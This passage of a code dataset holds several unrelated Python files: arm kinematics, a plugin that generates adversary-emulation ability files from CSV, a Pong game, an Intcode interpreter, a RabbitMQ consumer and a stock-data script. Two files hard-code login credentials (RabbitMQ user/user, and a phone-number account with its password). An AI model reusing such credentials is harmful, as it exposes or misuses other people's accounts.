sin(q1)*sin(q2)*sin(q3)), -cos(q2)*cos(q3)*l3*sin(q1) + cos(q2)*l2*sin(q1) + l3*sin(q1)*sin(q2)*sin(q3) + (l4 + l5)*(-cos(q4)*(cos(q2)*sin(q1)*sin(q3) + cos(q3)*sin(q1)*sin(q2)) + sin(q4)*(cos(q2)*cos(q3)*sin(q1) - sin(q1)*sin(q2)*sin(q3)))],\n [cos(q5)*(cos(q4)*(cos(q2)*sin(q3) + cos(q3)*sin(q2)) + sin(q4)*(-cos(q2)*cos(q3) + sin(q2)*sin(q3))), -sin(q5)*(cos(q4)*(cos(q2)*sin(q3) + cos(q3)*sin(q2)) + sin(q4)*(-cos(q2)*cos(q3) + sin(q2)*sin(q3))), -cos(q4)*(-cos(q2)*cos(q3) + sin(q2)*sin(q3)) + sin(q4)*(cos(q2)*sin(q3) + cos(q3)*sin(q2)), -cos(q2)*l3*sin(q3) - cos(q3)*l3*sin(q2) + l1 + l2*sin(q2) + (l4 + l5)*(-cos(q4)*(-cos(q2)*cos(q3) + sin(q2)*sin(q3)) + sin(q4)*(cos(q2)*sin(q3) + cos(q3)*sin(q2)))],\n [0, 0, 0, 1]])\n\n return (np.dot(tT,np.array([[0],[0],[0],[1]])))\n\n def __ConvertionToOurSK(self,q1,q2_1,q2_2,q3_1,q3_2,q4_1,q4_2,q5):\n q1 = round(q1 + self.__convertionAngleFor1,2)\n q2_1 = round(q2_1 + self.__convertionAngleFor2,2)\n q2_2 = round(q2_2 + self.__convertionAngleFor2,2)\n q3_1 = round(q3_1 + self.__convertionAngleFor3,2)\n q3_2 = round(q3_2 + self.__convertionAngleFor3,2)\n q4_1 = round(q4_1 + self.__convertionAngleFor4,2)\n q4_2 = round(q4_2 + self.__convertionAngleFor4,2)\n q5 = round(q5 + self.__convertionAngleFor5,2)\n return q1,q2_1,q2_2,q3_1,q3_2,q4_1,q4_2,q5\n\n def __VadatingOfJointAngle(self,q1,q2_1,q2_2,q3_1,q3_2,q4_1,q4_2,q5):\n countAvailJointState = 0\n if (q1 >= self.__joint_1_l or q1 <= self.__joint_1_u):\n countAvailJointState += 1\n if (self.__Validatingq2q3q4(q2_1,q3_1,q4_1)):\n q2 = q2_1\n q3 = q3_1\n q4 = q4_1\n countAvailJointState += 3\n if(countAvailJointState < 2):\n if(self.__Validatingq2q3q4(q2_2,q3_2,q4_2)):\n q2 = q2_2\n q3 = q3_2\n q4 = q4_2\n countAvailJointState += 3\n\n if (q5 >= self.__joint_5_l and q5 <= self.__joint_5_u):\n countAvailJointState +=1\n\n if (countAvailJointState == 5):\n availConfig = True\n return availConfig,q1,q2,q3,q4,q5\n else:\n availConfig = False\n return availConfig,0,0,0,0,0\n\n def __Validatingq2q3q4(self,q2,q3,q4):\n if (q2 >= self.__joint_2_l and q2 <= self.__joint_2_u):\n if (q3 >= self.__joint_3_l and q3 <= self.__joint_3_u):\n if (q4 >= self.__joint_4_l and q4 <= self.__joint_4_u):\n return True\n return False\n\n def 
InversProblem(self,x,y,z,pitch = 0,roll = 0):\n q5 = roll\n \n q1 = atan2(y,x)\n\n w = sqrt(x**2+y**2)\n\n z1 = (z - self.__l1) - (self.__l4 + self.__l5)*sin(pitch)\n w1 = w - (self.__l4 + self.__l5)*cos(pitch)\n\n c = (self.__l3**2-w1**2-z1**2-self.__l2**2)/(-2)\n a = z1**2 + w1**2\n b = -2*z1*c\n e = c**2 - self.__l2**2*w1**2\n\n D = b**2 - 4*a*e\n\n if (D < 0 ):\n return False,[0,0,0,0,0]\n\n z2_1 = (-b + sqrt(D))/(2*a)\n z2_2 = (-b - sqrt(D))/(2*a)\n\n w2_1 = (c-z2_1*z1)/w1\n w2_2 = (c-z2_2*z1)/w1\n\n q2_1 = atan2(z2_1,w2_1)\n q2_2 = atan2(z2_2,w2_2)\n\n joint3Angle_1 = atan2(z1 - z2_1,w1-w2_1)\n joint3Angle_2 = atan2(z1 - z2_2,w1-w2_2)\n\n q3_1 = pi - q2_1 + joint3Angle_1\n q3_2 = pi - q2_2 + joint3Angle_2\n\n q4_1 = -(joint3Angle_1 - pitch)-pi/2\n q4_2 = -(joint3Angle_2 - pitch)-pi/2\n\n q1,q2_1,q2_2,q3_1,q3_2,q4_1,q4_2,q5 = self.__ConvertionToOurSK(q1,q2_1,q2_2,q3_1,q3_2,q4_1,q4_2,q5)\n list_ = [q1,q2_1,q2_2,q3_1,q3_2,q4_1,q4_2,q5]\n for i, el in enumerate(list_):\n if el > 2*pi:\n list_[i] = el - 2*pi\n elif(el < -2*pi):\n list_[i] = el + 2*pi\n availConfig,q1,q2,q3,q4,q5 = self.__VadatingOfJointAngle(*list_)\n\n return availConfig,[q1,q2,q3,q4,q5]\n\n# arm = RoboticArm()\n# print(arm.DirectProblem(0, -1.57, 0, 1.57,0))\n# print(arm.InversProblem(200,0,197,1.57))","sub_path":"angle_ax12_model_pkg/nodes/RoboticArmClass.py","file_name":"RoboticArmClass.py","file_ext":"py","file_size_in_byte":7398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"265770710","text":"import json\nimport uuid\nimport csv\nimport os\n\nfrom datetime import datetime\nfrom io import StringIO\nfrom aiohttp import web\nfrom aiohttp_jinja2 import template\n\nfrom app.service.auth_svc import check_authorization\n\ndef generate_time_stamp():\n time_str = str(datetime.now())\n return time_str[2:4] + time_str[5:7] + time_str[8:10] + time_str[11:13] + time_str[14:16] + time_str[17:19]\n\ndef sanity_checks(header):\n try:\n mapper = {\n 'name': header.index('name'),\n 'description': header.index('description'),\n 'executor': header.index('executor'),\n 'test': header.index('test'),\n 'technique_id': header.index('technique_id'),\n 'technique_name': header.index('technique_name'),\n 'tactic': header.index('tactic'),\n 'cleanup': header.index('cleanup'),\n 'platform': header.index('platform'),\n 'payload': header.index('payload'),\n 'status': 1\n }\n if 'ability_id' in header:\n mapper['ability_id'] = header.index('ability_id')\n return mapper\n except Exception as err:\n print('Failed: ' + str(err))\n return {'status': 0}\n\ntactics = ['collection', 'command-and-control', 'credential-access', 'defense-evasion', 'discovery', 'execution', 'exfiltration', 'impact', 'initial-access', 'lateral-movement', 'multiple', 'persistence', 'privilege-escalation', 'technical-information-gathering']\n\ndef write_new_adversary(category, os_name, value, path):\n \n filler = max(0, 25 - len(value) - 1)\n filename_adv = 'SEC#'+os_name[:4] + '-' + value[:24] + '-' + filler*'x'\n counter = 1\n with open(path + 'data/adversaries/' + filename_adv + '.yml', 'w') as f:\n f.write('---\\n\\nid: ' + filename_adv + '\\n')\n f.write('name: SEC adversary ' + os_name + ' - ' + category + ' - ' + value + '\\n')\n f.write('description: SEC adversary including all abilities for which ' + category + ' starts with ' + value + '\\n')\n f.write('visible: 1\\n')\n f.write('phases:\\n')\n if not os_name == '_all':\n if category == 'all':\n for subdir, dirs, files in os.walk(path + 
'data/abilities'):\n for filename in files:\n if filename.endswith('.yml') or filename.endswith('.yaml'):\n try:\n with open (subdir + '/' + filename) as reading:\n line = reading.readline()\n while line and not os_name+':' in line:\n line = reading.readline()\n if line:\n f.write(' ' + str(counter) + ':\\n')\n f.write(' - ' + str(filename[:-4] + '\\n'))\n counter += 1\n except Exception as err:\n print(str(err) + ' ' + str(counter))\n\n else:\n for subdir, dirs, files in os.walk(path + 'data/abilities'):\n for filename in files:\n if filename.endswith('.yaml') or filename.endswith('.yml'):\n try:\n os_b = False\n value_b = False\n with open (subdir + '/' + filename) as reading:\n line = reading.readline()\n while line:\n while line and not category in line and not os_name + ':' in line:\n line = reading.readline()\n if line:\n if os_name + ':' in line:\n os_b = True\n line = reading.readline()\n elif value in line:\n value_b = True\n line = reading.readline()\n elif ': |' in line:\n line = reading.readline()\n if value in line:\n value_b = True\n line = reading.readline()\n else:\n line = reading.readline()\n if os_b and value_b:\n f.write(' ' + str(counter) + ':\\n')\n f.write(' - ' + str(filename[:-4] + '\\n'))\n counter += 1\n \n except Exception as err:\n print(str(err) + ' ' + str(counter))\n else:\n if category == 'all':\n for subdir, dirs, files in os.walk(path + 'data/abilities'):\n for filename in files:\n if filename.endswith('.yml') or filename.endswith('.yaml'):\n f.write(' ' + str(counter) + ':\\n')\n f.write(' - ' + str(filename)[:-4] + '\\n')\n counter += 1\n else:\n for subdir, dirs, files in os.walk(path + 'data/abilities'):\n for filename in files:\n if filename.endswith('.yaml') or filename.endswith('.yml'):\n try:\n with open (subdir + '/' + filename) as reading:\n line = reading.readline()\n while line:\n while line and not category in line:\n line = reading.readline()\n if line:\n if value in line:\n f.write(' ' + str(counter) + ':\\n')\n f.write(' - ' + str(filename[:-4] + '\\n'))\n counter += 1\n line = None\n elif value in reading.readline():\n f.write(' ' + str(counter) + ':\\n')\n f.write(' - ' + str(filename[:-4] + '\\n'))\n counter += 1\n line = None\n else:\n line = reading.readline()\n except Exception as err:\n print(str(err) + ' ' + str(counter))\n\n \n if counter == 1:\n os.remove(path + 'data/adversaries/' + filename_adv + '.yml')\n \n\n return counter\n\n\nclass ImporterService:\n\n def __init__(self, services):\n self.services = services\n self.auth_svc = self.services.get('auth_svc')\n self.data_svc = self.services.get('data_svc')\n self.rest_svc = self.services.get('rest_svc')\n self.stockpile_path = os.path.dirname(os.path.abspath(__file__)).split('importer', 1)[0] + 'stockpile/'\n\n @template('importer.html')\n async def splash(self, request):\n await self.auth_svc.check_permissions(request)\n adversaries = [a.display for a in await self.data_svc.locate('adversaries')]\n categories = ['id', 'name', 'description', 'tactic', 'attack_id', 'command', 'cleanup', 'payload']\n return dict(adversaries=sorted(adversaries, key=lambda a: a['name']),categories=categories)\n\n @check_authorization\n async def generateAdv(self, request):\n \n args = json.loads(await request.read())\n if args['category'] == 'tactic' and args['term'] == '':\n category = 'tactic'\n # Create adversary for each tactic for each os\n for value in tactics:\n write_new_adversary(category, 'windows', value, self.stockpile_path)\n write_new_adversary(category, 'linux', value, 
self.stockpile_path)\n write_new_adversary(category, 'darwin', value, self.stockpile_path)\n # Create adversary with all (Stable) tests for each os\n write_new_adversary('description', 'windows', '(Stable)', self.stockpile_path)\n write_new_adversary('description', 'linux', '(Stable)', self.stockpile_path)\n write_new_adversary('description', 'darwin', '(Stable)', self.stockpile_path)\n return web.json_response({\"status\":\"successful\"})\n else:\n write_new_adversary(args['category'], '_all', args['term'], self.stockpile_path)\n return web.json_response({\"Status\":\"successful\"})\n\n @check_authorization\n async def create_ability_from_csv(self, request):\n \"\"\"\n Takes a layer file and generates an adversary that matches the selected tactics and techniques.\n Adversary will be divided into phases by tactic\n :param request:\n :return:\n \"\"\"\n\n try:\n csv_file = await self.read_csv(request)\n except json.decoder.JSONDecodeError:\n return web.HTTPBadRequest()\n\n\n dir_path = os.path.dirname(os.path.realpath(__file__))\n mapping = sanity_checks(next(csv_file))\n if mapping['status'] == 0:\n return web.HTTPBadRequest()\n \n counter = 0\n print('mapping done')\n for ability in csv_file:\n print(ability)\n \n if not len(ability[mapping['technique_id']]) == 5 or not ability[mapping['technique_id']].startswith('T'):\n return web.HTTPBadRequest()\n if not ability[mapping['tactic']] in tactics:\n return web.HTTPBadRequest()\n \n if 'ability_id' in mapping.keys() and not ability[mapping['ability_id']] == '':\n ability_id = ability[mapping['ability_id']]\n print('id in test')\n else:\n ability_id = 'SEC' + ability[mapping['platform']][:3] + 'v1-' + ability[mapping['tactic']][:4] + '-' + ability[mapping['technique_id']][1:] + '-'+ str(counter).zfill(4)+'-' + generate_time_stamp()\n print('id not in test') \n\n file_name = self.stockpile_path + 'data/abilities/' + ability[mapping['tactic']] + '/' + ability_id + '.yml'\n try:\n with open(file_name, 'w') as yaml:\n yaml.write('---\\n\\n- id: ' + ability_id + '\\n')\n yaml.write(' name: ' + ability[mapping['name']] + '\\n')\n yaml.write(' description: |\\n ' + ability[mapping['description']] + '\\n')\n yaml.write(' tactic: ' + ability[mapping['tactic']] + '\\n')\n yaml.write(' technique:\\n')\n yaml.write(' attack_id: ' + ability[mapping['technique_id']] + '\\n')\n yaml.write(' name: ' + ability[mapping['technique_name']] + '\\n')\n yaml.write(' platforms:\\n')\n yaml.write(' ' + ability[mapping['platform']] + \":\\n\")\n yaml.write(' ' + ability[mapping['executor']] + ':\\n')\n yaml.write(' command: |\\n')\n yaml.write(' ' + ability[mapping['test']].replace('€','\\n ') + '\\n')\n if len(ability[mapping['cleanup']]) > 0:\n yaml.write(' cleanup: |\\n')\n yaml.write(' ' + ability[mapping['cleanup']].replace('€', '\\n ') + '\\n')\n if len(ability[mapping['payload']]) > 0:\n yaml.write(' payload: ' + ability[mapping['payload']]) \n except Exception as err:\n return web.HTTPBadRequest()\n counter += 1 \n return web.json_response('true') \n","sub_path":"plugins/importer/app/importer_svc.py","file_name":"importer_svc.py","file_ext":"py","file_size_in_byte":12424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"612832651","text":"import turtle\nimport os\nfrom time import sleep\n\n\n# Settings\n\n# Score needed to win\nwinscore = 1\n# Player Names\nplayername_a = (\"Spieler 1\")\nplayername_b = (\"Spieler 2\")\n# Paddle Sizes\npaddle_size = 60\n# Float digits\nflt_dgt = 3\n# Speed added after 
Point\npt_speed = 0.05\n# Speed added after Paddle touch\ntch_speed = 0.01\n# Ball Speed\n\nball_speed = 0.1\n\nwn = turtle.Screen()\nwn.title(\"Python Pong\")\nwn.bgcolor(\"black\")\nwn.setup(width=800,height=600)\nwn.tracer(0)\n\n# Paddle A\npaddle_a = turtle.Turtle()\npaddle_a.speed(0)\npaddle_a.shape(\"square\")\npaddle_a.color(\"white\")\npaddle_a.shapesize(stretch_wid=(paddle_size / 10),stretch_len=1)\npaddle_a.penup()\npaddle_a.goto(-350,0)\n\n# Paddle B\npaddle_b = turtle.Turtle()\npaddle_b.speed(0)\npaddle_b.shape(\"square\")\npaddle_b.color(\"white\")\npaddle_b.shapesize(stretch_wid=(paddle_size / 10),stretch_len=1)\npaddle_b.penup()\npaddle_b.goto(350,0)\n\n# Ball\nball = turtle.Turtle()\nball.speed(0)\nball.shape(\"circle\")\nball.color(\"white\")\nball.shapesize(stretch_wid=1,stretch_len=1)\nball.penup()\nball.goto(0,0)\nbspeed = 0.1\nball.dx = ball_speed\nball.dy = ball_speed\n\n\n\n# Scoreboard\nscore_a = 0\nscore_b = 0\npen = turtle.Turtle()\npen.speed(0)\npen.color(\"white\")\npen.penup()\npen.hideturtle()\npen.goto(0,240)\npen.write(\"{}: 0 | {}: 0 \\n Speed : 0.1\".format(playername_a, playername_b), align=\"center\", font=(\"Courier\",16,\"bold\"))\n\n#punkt fuer b\nlos_a = turtle.Turtle()\nlos_a.speed(0)\nlos_a.color(\"white\")\nlos_a.penup()\nlos_a.goto(0,0)\nlos_a.shape(\"square\")\nlos_a.shapesize(stretch_wid=100, stretch_len=100)\n\n#punkt fuer a\nlos_b = turtle.Turtle()\nlos_b.speed(0)\nlos_b.color(\"white\")\nlos_b.penup()\nlos_b.goto(0,100)\nlos_b.shape(\"square\")\nlos_b.shapesize(stretch_wid=100, stretch_len=100)\n\n#a gewonnen\nwin_a = turtle.Turtle()\nwin_a.speed(0)\nwin_a.color(\"white\")\nwin_a.penup()\nwin_a.goto(0,0)\nwin_a.shape(\"square\")\nwin_a.shapesize(stretch_wid=100, stretch_len=100)\n\n# b gewonnen\nwin_b = turtle.Turtle()\nwin_b.speed(0)\nwin_b.color(\"white\")\nwin_b.penup()\nwin_b.goto(0,0)\nwin_b.shape(\"square\")\nwin_b.shapesize(stretch_wid=100, stretch_len=100)\n\n\n# Funktion\ndef paddle_a_up():\n\tif paddle_a.ycor() < (300 - paddle_size):\n\t\ty = paddle_a.ycor()\n\t\ty += 20\n\t\tpaddle_a.sety(y)\n\ndef paddle_a_down():\n\tif paddle_a.ycor() > (-300 + paddle_size):\n\t\ty = paddle_a.ycor()\n\t\ty -= 20\n\t\tpaddle_a.sety(y)\n\ndef paddle_b_up():\n\tif paddle_b.ycor() < (300 - paddle_size):\n\t\ty = paddle_b.ycor()\n\t\ty += 20\n\t\tpaddle_b.sety(y)\n\ndef paddle_b_down():\n\tif paddle_b.ycor() > (-300 + paddle_size):\n\t\ty = paddle_b.ycor()\n\t\ty -= 20\n\t\tpaddle_b.sety(y)\n\ndef a_los():\n\tpaddle_b.sety(0)\n\tpaddle_a.sety(0)\n\tfor i in range(3):\n\t\tlos_a.showturtle()\n\t\twn.update()\n\t\tsleep(0.1)\n\t\tlos_a.hideturtle()\n\t\twn.update()\n\t\tsleep(0.1)\n\n\ndef b_los():\n\tpaddle_b.sety(0)\n\tpaddle_a.sety(0)\n\tfor i in range(3):\n\t\tlos_b.showturtle()\n\t\twn.update()\n\t\tsleep(0.1)\n\t\tlos_b.hideturtle()\n\t\twn.update()\n\t\tsleep(0.1)\n\ndef win():\n\tif score_a == winscore:\n\t\twin_a.showturtle()\n\t\twtxt_a = turtle.Turtle()\n\t\twtxt_a.speed(0)\n\t\twtxt_a.color(\"black\")\n\t\twtxt_a.penup()\n\t\twtxt_a.hideturtle()\n\t\twtxt_a.goto(0,0)\n\t\twtxt_a.write(\"{} has won!\".format(playername_a), align=\"center\",font=(\"Courier\",24,\"bold\"))\n\t\twtxt_a.shape(\"square\")\n\t\twtxt_a.shapesize(stretch_wid=30,stretch_len=30)\n\n\telif score_b == winscore:\n\t\twin_b.showturtle()\n\t\twtxt_b = turtle.Turtle()\n\t\twtxt_b.speed(0)\n\t\twtxt_b.color(\"black\")\n\t\twtxt_b.penup()\n\t\twtxt_b.hideturtle()\n\t\twtxt_b.write(\"{} has won!\".format(playername_b), 
align=\"center\",font=(\"Courier\",24,\"bold\"))\n\t\twtxt_b.goto(0,0)\n\t\twtxt_b.shape(\"square\")\n\t\twtxt_b.shapesize(stretch_wid=30,stretch_len=30)\n\telse:\n\t\tdraw = turtle.Turtle\n\t\tdraw.speed(0)\n\t\tdraw.color(\"Black\")\n\t\tdraw.penup()\n\t\tdraw.hideturtle()\n\t\tdraw.write(\"Draw!\")\n\n\n#Keyboard Binding\nwn.listen()\nwn.onkeypress(paddle_a_up,\"w\")\nwn.onkeypress(paddle_a_down,\"s\")\n\nwn.onkeypress(paddle_b_up,\"Up\")\nwn.onkeypress(paddle_b_down,\"Down\")\n\n# Main game loop\nwhile True :\n\n\tif score_a < winscore and score_b < winscore:\n\t\t\n\t\twin_a.hideturtle()\n\t\twin_b.hideturtle()\n\t\tspeed = round(bspeed, flt_dgt)\n\t\tlos_a.hideturtle()\n\t\tlos_b.hideturtle()\n\n\t\twn.update()\n\t\t#Move the ball\n\t\tball.setx(ball.xcor() + ball.dx)\n\t\tball.sety(ball.ycor() + ball.dy)\n\n\t\t# Border checking\n\n\t\t#oben\n\t\tif ball.ycor() > 290:\n\t\t\tball.sety(290)\n\t\t\tball.dy *= -1\n\t\t\n\t\t#unten\n\t\tif ball.ycor() < -290:\n\t\t\tball.sety(-290)\n\t\t\tball.dy *= -1\n\t\t\n\t\t#rechte seite\n\t\tif ball.xcor() > 390:\n\t\t\tball.goto(0,0)\n\t\t\tball.dx *= -1\n\t\t\tscore_a += 1\n\t\t\tb_los()\n\t\t\tbspeed += pt_speed\n\t\t\tpen.clear()\n\t\t\tpen.write(\"{}: {} | {}: {} \\n Speed : {} \".format(playername_a, score_a,playername_b, score_b, speed), align=\"center\", font=(\"Courier\",16,\"bold\"))\n\n\t\t#linke seite\n\t\tif ball.xcor() < -390:\n\t\t\tball.goto(0,0)\n\t\t\tball.dx *= -1\n\t\t\tscore_b += 1\n\t\t\ta_los()\n\t\t\tbspeed += pt_speed\n\t\t\tpen.clear()\n\t\t\tpen.write(\"{}: {} | {}: {} \\n Speed : {} \".format(playername_a, score_a,playername_b,score_b, speed), align=\"center\", font=(\"Courier\",16,\"bold\"))\n\n\t\t#Paddle Collision\n\t\tif ball.xcor() > 340 and (ball.xcor() < 350) and (ball.ycor() < paddle_b.ycor() + paddle_size and ball.ycor() > paddle_b.ycor() - paddle_size):\n\t\t\tball.dx *= -1\n\t\t\tball.setx(340)\n\t\t\tpen.clear()\n\t\t\tbspeed += tch_speed\n\t\t\tpen.write(\"{}: {} | {}: {} \\n Speed : {} \".format(playername_a, score_a,playername_b,score_b, speed), align=\"center\", font=(\"Courier\",16,\"bold\"))\n\n\t\tif ball.xcor() < -340 and (ball.xcor() > -350) and (ball.ycor() < paddle_a.ycor() + paddle_size and ball.ycor() > paddle_a.ycor() - paddle_size):\n\t\t\tball.dx *= -1\n\t\t\tball.setx(-340)\n\t\t\tpen.clear()\n\t\t\tbspeed += tch_speed\n\t\t\tpen.write(\"{}: {} | {}: {} \\n Speed : {} \".format(playername_a, score_a,playername_b,score_b, speed), align=\"center\", font=(\"Courier\",16,\"bold\"))\n\telse :\n\t\twin()\n\t\twn.update()\n\t\t\n# Made by Sturm2002 / Sturm2002\n# Somewhere end 2019 ","sub_path":"pong.py","file_name":"pong.py","file_ext":"py","file_size_in_byte":5751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"32784360","text":"# -*- coding: utf-8 -*-\n\nfrom setuptools import setup\n# from setuptools import find_packages\n\n\nwith open('README.md') as f:\n readme = f.read()\n\nwith open('LICENSE') as f:\n license = f.read()\n\nsetup(\n name='rocket-fuel-sdk-rest',\n version='0.2.0',\n description='ExactTarget REST API Wrapper',\n long_description=readme,\n author='JBA',\n author_email='lex@jbadigital.com.com',\n url='https://github.com/jbadigital/rocket-fuel-sdk-rest',\n license=license,\n install_requires=['requests'],\n packages=['rocket_fuel_sdk_rest']\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} 
+{"seq_id":"34747084","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom gpiozero import LED\nfrom time import sleep\n\nLED_R_PIN = 17 # Red\nLED_Y_PIN = 27 # Yellow\nLED_G_PIN = 22 # Green\nWAIT_TIME = 3\n\nled_list = [\n LED(LED_R_PIN),\n LED(LED_Y_PIN),\n LED(LED_G_PIN)\n]\nfor led in led_list:\n led.on()\nsleep(WAIT_TIME)\nfor led in led_list:\n led.off()\n\n","sub_path":"py12/04/led_list2.py","file_name":"led_list2.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"170743143","text":"import sys\n\ndef extend(mode, memory, ptr):\n m = int(mode)\n if m == 1:\n return\n\n if (ptr >= len(memory)):\n diff = ptr - len(memory) + 1\n extension = ['0'] * diff\n memory.extend(extension) \n \ndef set_val(ptr, val, relative_base = None, mode = None):\n m = int(mode) if mode != None else 0\n addr = int(memory[ptr])\n\n if m == 2:\n addr += relative_base\n \n extend(m, memory, addr) \n memory[addr] = val\n\ndef get_val(mode, op, i, relative_base):\n m = int(mode)\n extend(mode, op, i)\n addr = int(op[i])\n \n if m == 0:\n return int(op[addr]) \n elif m == 2:\n return int(op[relative_base + addr]) \n \n return addr\n\nif __name__ == \"__main__\": \n f = open(sys.argv[1])\n memory = f.read().split(',')\n f.close()\n \n ptr = 0\n relative_base = 0\n while ptr < len(memory): \n instruction = int(memory[ptr][-2:]) if len(memory[ptr]) > 1 else int(memory[ptr]) \n mode1 = memory[ptr][-3:-2] if len(memory[ptr]) > 2 else 0\n mode2 = memory[ptr][-4:-3] if len(memory[ptr]) > 3 else 0\n mode3 = memory[ptr][0] if len(memory[ptr]) > 4 else 0 \n\n if instruction == 1: \n val = str(get_val(mode1, memory, ptr + 1, relative_base) + get_val(mode2, memory, ptr + 2, relative_base))\n set_val(ptr + 3, val, relative_base, mode3)\n ptr += 4 \n elif instruction == 2: \n val = str(get_val(mode1, memory, ptr + 1, relative_base) * get_val(mode2, memory, ptr + 2, relative_base))\n set_val(ptr + 3, val, relative_base, mode3)\n ptr += 4\n elif instruction == 3:\n val = input('Input: ')\n set_val(ptr + 1, str(val), relative_base, mode1)\n ptr += 2\n elif instruction == 4:\n print('Output: ', get_val(mode1, memory, ptr + 1, relative_base)) \n ptr += 2\n elif instruction == 5:\n ptr = get_val(mode2, memory, ptr + 2, relative_base) if get_val(mode1, memory, ptr + 1, relative_base) != 0 else ptr + 3\n elif instruction == 6:\n ptr = get_val(mode2, memory, ptr + 2, relative_base) if get_val(mode1, memory, ptr + 1, relative_base) == 0 else ptr + 3\n elif instruction == 7:\n val = '1' if get_val(mode1, memory, ptr + 1, relative_base) < get_val(mode2, memory, ptr + 2, relative_base) else '0'\n set_val(ptr + 3, val, relative_base, mode3)\n ptr += 4 \n elif instruction == 8:\n val = '1' if get_val(mode1, memory, ptr + 1, relative_base) == get_val(mode2, memory, ptr + 2, relative_base) else '0'\n set_val(ptr + 3, val, relative_base, mode3)\n ptr += 4\n elif instruction == 9:\n relative_base += int(get_val(mode1, memory, ptr + 1, relative_base))\n ptr += 2\n elif instruction == 99:\n break","sub_path":"Day9/Day9_Part2.py","file_name":"Day9_Part2.py","file_ext":"py","file_size_in_byte":2944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"182719733","text":"import pika\n\ncredentials = pika.PlainCredentials('user', 'user')\nconnection = pika.BlockingConnection(pika.ConnectionParameters('10.20.1.54', 30672, '/', credentials))\n\n\ndef on_message(channel, method_frame, header_frame, 
body):\n print(method_frame.delivery_tag)\n print(body)\n print()\n channel.basic_ack(delivery_tag=method_frame.delivery_tag)\n\nchannel = connection.channel()\nchannel.basic_consume('hello', on_message)\n\ntry:\n channel.start_consuming()\nexcept KeyboardInterrupt:\n channel.stop_consuming()\nconnection.close()","sub_path":"data-preprocess/test-code/mq_test.py","file_name":"mq_test.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"627673328","text":"\r\nfrom jq_include import *\r\nfrom jq_data_capi import *\r\nfrom jq_callback_capi import *\r\nfrom jq_playback_capi import *\r\nfrom jq_subscriber_capi import *\r\nimport time\r\nimport pandas as pd\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n start_date='2016-02-01'\r\n end_date='2019-12-31'\r\n\r\n start_time=' 9:30:00'\r\n end_time=' 15:00:00'\r\n\r\n stock_code='000001.XSHE'\r\n\r\n new_ebq = jq_data()\r\n ip_str = \"10.84.137.198\"\r\n # ip = bytes(ip_str, encoding = \"utf-8\")\r\n result = new_ebq.connect(ip_str, 7000)\r\n l_result = new_ebq.login(\"13100000002\", \"gdzq12345\")\r\n\r\n day_ls=new_ebq.get_trade_days(start_date,end_date)\r\n\r\n # test_day='2016-05-30'\r\n # tick=len(new_ebq.get_stock_ticks(stock_code,test_day+start_time,test_day+end_time))\r\n # print(tick)\r\n\r\n\r\n # para=[]\r\n # for d in day_ls:\r\n # day=d.decode()\r\n # tick=len(new_ebq.get_stock_ticks(stock_code,day+start_time,day+end_time))\r\n # #trade=len(new_ebq.get_trades(stock_code,day+start_time,day+end_time))\r\n # #order=len(new_ebq.get_orders(stock_code,day+start_time,day+end_time))\r\n # #para.append([day,tick,trade,order])\r\n # para.append([day, tick])\r\n # print(day)\r\n # print(tick)\r\n # paraDF=pd.DataFrame(para,columns=['date','tick'])\r\n # paraDF.to_csv('flag_tick.csv')\r\n\r\n\r\n # para = []\r\n # for d in day_ls:\r\n # day = d.decode()\r\n # #tick = len(new_ebq.get_stock_ticks(stock_code, day + start_time, day + end_time))\r\n # trade=len(new_ebq.get_trades(stock_code,day+start_time,day+end_time))\r\n # # order=len(new_ebq.get_orders(stock_code,day+start_time,day+end_time))\r\n # # para.append([day,tick,trade,order])\r\n # para.append([day, trade])\r\n # print(day)\r\n # print(trade)\r\n # paraDF = pd.DataFrame(para, columns=['date', 'trade'])\r\n # paraDF.to_csv('flag_trade.csv')\r\n #\r\n\r\n\r\n para = []\r\n for d in day_ls:\r\n day = d.decode()\r\n #tick = len(new_ebq.get_stock_ticks(stock_code, day + start_time, day + end_time))\r\n #trade=len(new_ebq.get_trades(stock_code,day+start_time,day+end_time))\r\n try:\r\n order=len(new_ebq.get_orders(stock_code,day+start_time,day+end_time))\r\n except:\r\n order=0\r\n\r\n # para.append([day,tick,trade,order])\r\n para.append([day, order])\r\n print(day)\r\n print(order)\r\n paraDF = pd.DataFrame(para, columns=['date', 'order'])\r\n paraDF.to_csv('flag_order.csv')\r\n","sub_path":"test0807.py","file_name":"test0807.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"39620288","text":"# Developed by Amresh Ranjan.\n\nfrom tkinter import *\nfrom tkinter.ttk import *\n\nfrom time import strftime\n\nroot = Tk()\n\nroot.title('Digital Clock using Tkinter GUI')\n\ndef clock():\n\ttick = strftime('%H:%M:%S %p')\n\n\tlabel.config(text =tick)\n\n\tlabel.after(1000, clock)\n\nlabel = Label(root, font =('sans', 90), background = 'black', foreground = 'yellow')\n\nlabel.pack(anchor= 
